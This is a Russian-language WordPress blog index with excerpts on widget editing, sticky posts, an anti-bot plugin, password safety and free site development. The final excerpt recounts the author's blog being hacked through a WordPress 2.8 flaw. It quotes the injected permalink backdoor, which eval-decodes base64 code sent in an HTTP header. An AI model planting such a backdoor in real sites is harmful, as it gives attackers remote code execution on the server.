Как убрать wordpress.org из мета-виджета блога на WordPress?

1. Открываем файлик: /wp-includes/default-widgets.php
2. Ищем поиском по тексту (Ctrl+F) фразу wordpress.org, находим ее в строке:

1
<li><a href="http://wordpress.org/" title="<?php echo esc_attr(__('Powered by WordPress, state-of-the-art semantic personal publishing platform.')); ?>">WordPress.org</a></li>

3. Удаляем всю строку и перезаливаем исправленный файл по ftp на сервер в ту же папку /wp-includes/. Готово.
(далее…)

Как сделать ссылку только на главной странице

Для того, чтобы добавить код (баннер, ссылку) только на главную страницу своего сайта или блога на WordPress, достаточно использовать инструкцию:

1
2
3
4
5
<?php if ( is_home() ) { ?>

// ваш html-, php-код, баннер или просто текст

<?php } ?>

(далее…)

Почему при установке руссифицированного WordPress админка может быть на английском

Давно обещал знакомой поставить и настроить блог на WordPress. Проснувшись утром в субботу, я решил выделить наконец-то пару часов и настроить ей блог со всеми полезными плагинами. Благо задача установки вордпресс-блога тривиальна и я их уже ставил раз 20.

Внезапно админка Ворбпресс стала английской

Но не тут-то было. Установка проходила без проблем, но админка все время была англоязычной. Ни свежескачанные с официального сайта дистрибутивы, ни архивные, ни лекактусовские не устанавливались на русском языке. Плагины тоже были ни при чем – ставился голый стандартный Вордпресс и плагинов в нем не было. Файл конфигов wp-config.php правился только блокнотом, устанавливался Вордпресс в 3-х разных браузерах без со стандартными настройками без фильтров рекламы и прочих фишек.
(далее…)

Плагин Sabre: ставим защиту от ботов на странице регистрации в блоге WordPress

По какой-то непонятной мне причине при регистрации на блоге под управлением админки WordPress не нужно вводить никакой капчи. То ли авторы этой админки не считают проблемой многочисленные автоматические регистрации спам-ботов, то ли стандартная защита от спама все равно будет взломана, но факт остается фактом. Чтобы усложнить жизнь авторегистрирующимся спам-программам придется ставить специальный плагин. Например, Sabre.

Страница регистрации в WordPress с математическим антиспамом

Я долгое время не обращал внимание на количество регистраций на своих wordpress-блогах. Новые комментарии появляются – и хорошо. Ведь чтобы их оставлять регистрироваться не нужно, а парочка антиспам-фильтров доблестно сражаются с автоматическим постингом комментов – вот я не придумывал себе лишних проблем. Пока, проводя литературный конкурс на своем сайте о прохождении игр с доменом в зоне .com, не увидел масштабы проблемы.
(далее…)

Кто и зачем разрабатывает бесплатные сайты для клиентов

Как известно, любая работа, сделанная качественно и в срок, должна быть оплачена. Разработка и продвижение качественных сайтов, без сомнения, является работой сложной, требующая знаний, опыта, существенных затрат времени и сил. А значит, стоит достаточно дорого. В то же время в интернете есть достаточно предложений сделать сайт для клиента бесплатно. Реально ли это? И в чем выгода людей, занимающихся разработкой бесплатных сайтов?

Сделать сайт бесплатно

Начнем с того, что все бесплатное в интернете часто бывает просто уловкой или откровенным разводом на деньги. Некоторые школьники и нерадивые студенты, предел мечтаний которых ограничивается желанием впарить кому-то некачественный сайт за 200 долларов, создают странички и даже целые сайты с весьма заманчивыми предложениями. Такие сайты слегка раскручиваются по нужным ключевым запросам (довольно конкурентным, кстати) и юные «паучата» замирают в ожидании неосторожной жертвы их «тонкого развода». Помимо школьников, мечтающих о дополнительных карманных деньгах, продажей воздуха в виде «сканеров и перехватчиков SMS», «уникальных диет» или «голой Бритни Спирс в окружении марсиан» занимаются и опытные веб-мастера с серьезным вложением денег в разработку и раскрутку таких сайтов-ловушек. Говорят, дело прибыльное.

Но есть и реальные предложения, которые, на первый взгляд, кажутся неправдоподобно привлекательными. В том числе много настоящих предложений по бесплатной разработке качественных бизнес-сайтов. Давайте разберемся, в чем интерес для вебмастера делать хороший коммерческий сайт бесплатно для незнакомого человека.
(далее…)

Откуда берутся недозаполненные контентом сайты

контент для сайта

Для решения задачи разработки сайта типичной компании вполне достаточно дизайна на шаблоне и возможностей большинства бесплатных систем управления контентом (Joomla, WordPress, Typo3 и т.д.) с набором стандартных модулей. Типичный набор сайта компании малого или среднего бизнеса – новостная лента, модуль добавления статей и информации о компании, каталог продукции и фотогалерея для самых творчески настроенных. Выбор среди бесплатных шаблонов дизайна для сайта огромен, админки, которых изо дня в день заставляют решать типичные задачи, легко настраиваемы.

Так почему же клиенты отчаянно пытаются заказывать нестандартный дизайн с нестандартной функциональностью, переплачивая за свои прихоти цену, в несколько раз больше необходимой? Действительно ли компании так прониклись идеей необходимости своего присутствия в интернете, что им не жаль никаких денег ради качественного сайта?
(далее…)

Как прикрепить новость или статью в WordPress

Иногда бывает нужно прикрепить пост (статью или новость) в блоге WordPress, чтобы публикация не сдвигалась вниз при добавлении более новых записей. Достаточно долго в блогах на WordPress не было стандартной возможности прикреплять записи и для закрепления поста вверху страницы приходилось устанавливать специальные плагины, например, WP Sticky. Многие блогеры до сих пор используют плагин WordPress WP Sticky чтобы прикреплять посты, хотя есть более простой и удобный способ – использовать стандартную возможность самой админки WordPress.

Предлагаю вам подробную инструкцию того, как прикрепить новость или анонс статьи вверху страницы своего блога. Инструкция написана для версии WordPress 2.8.4 и выше. Если у вас более старая версия движка WordPress, настоятельно рекомендую обновиться до самой новой, дабы избежать проблем со взломом блога.

Как прикрепить пост вверху страницы блога WordPress:

1. Открываем админку WordPress, придумываем текст поста, добавляем в него иллюстрации, ключевые слова и публикуем.

2. Находим опубликованную запись, которую мы собираемся прикрепить над остальными постами блога (Администрирование->Записи->Изменить). Наводим указатель мышки на заголовок поста и нажимаем на появившуюся ссылку Свойства:

Свойства записи в WordPress

(далее…)

Как защитить блог WordPress от взлома

Большинство сайтов и блогов взламываются автоматически, т.е. без прямого участия взломщика. Специальные скрыпты и программы (вирусы) находят уязвимости в системах управления и скриптах сайта, подбирают простые пароли к учетным записям администратора, воруют пароли с помощью троянов и клавиатурных шпионов. Конечно, от всего не убережешься, но если соблюдать несколько простых правил, можно процентов на 90 уменьшить вероятность взлома своего блога. После взлома этого блога я очень забочусь о безопасности :).

Защита блога от взлома

Как защитить блог от взлома:

1. Придумать или сгенерировать уникальные сложные пароли для разных сайтов.
Хороший пароль не должен быть похож на осмысленное слово или словосочетание, в нем должны быть спецсимволы, цифры и буквы разных регистров. Такие пароли сложно запомнить, потому их лучше записать на бумаге или использовать для этого специальные программы, которые хранят пароли в зашифрованном виде.

2. Настроить программу хранения паролей в зашифрованном виде.
Конечно, пароли можно хранить в блокноте на рабочем столе. Очень удобно, но очень небезопасно. Рано или поздно ваш компьютер подцепит какую-то заразу и все ваши пароли могут стать достоянием общественности.

У меня был такой файлик и я знаю, как тяжело избавиться от привычки хранить пароли в одном месте в открытом виде. Но в один прекрасный день, после 2х суток исправления последствий заражения моих сайтов злым вирусом по FTP, я потратил 3 часа на установку и переписывание обновленных паролей в специальную программу, которая хранит пароли в зашифрованном виде. Заодно перестал хранить пароли к ftp в Total Commander. Да, нудно и неудобно, зато с тех пор мои пароли не воровались. Нервные клетки мне очень благодарны.

Программ для хранения зашифрованных паролей очень много, есть платные, есть бесплатные. Не буду писать, какой программой пользуюсь я — чем меньше потенциальные взломщики знают о вашей защите, тем лучше ;).

(далее…)

Взлом моего блога через уязвимость WordPress

Скупой платит дважды, а ленивый работает в два раза больше. Об этом я вспомнил, когда мой блог стал очередной жертвой уязвимости в движке WordPress 2.8, устраненной только в версии WordPress 2.8.4. Благодаря этой дыре можно удаленно изменить пароль администратора блога WordPress, получив тем самым полный доступ к админке блога. Как что не стоит лениться обновлять движок до последней версии – спокойнее спаться будет.

В принципе, скрипт, получивший доступ к админке моего блога, не сделал ничего страшного. Или просто не успел сделать. Ко всем ссылкам на статьи блога дописывалось что-то вроде

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
и
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

Этот код делал почти все ссылки блога мертвыми, переходы на посты не работали. Я перезалил шаблоны из последнего бэкапа, обновил движок WordPress, но ссылки не стали прежними. Файл .htaccess тоже был в порядке. Подозрение, что взломан хостинг, тоже не оправдались. И только просматривая параметры постоянных ссылок (Администрирование->Параметры->Постоянные ссылки) блога, я с удивлением заметил следующее:

Изменение шаблона ссылки в результате взлома WordPress

(далее…)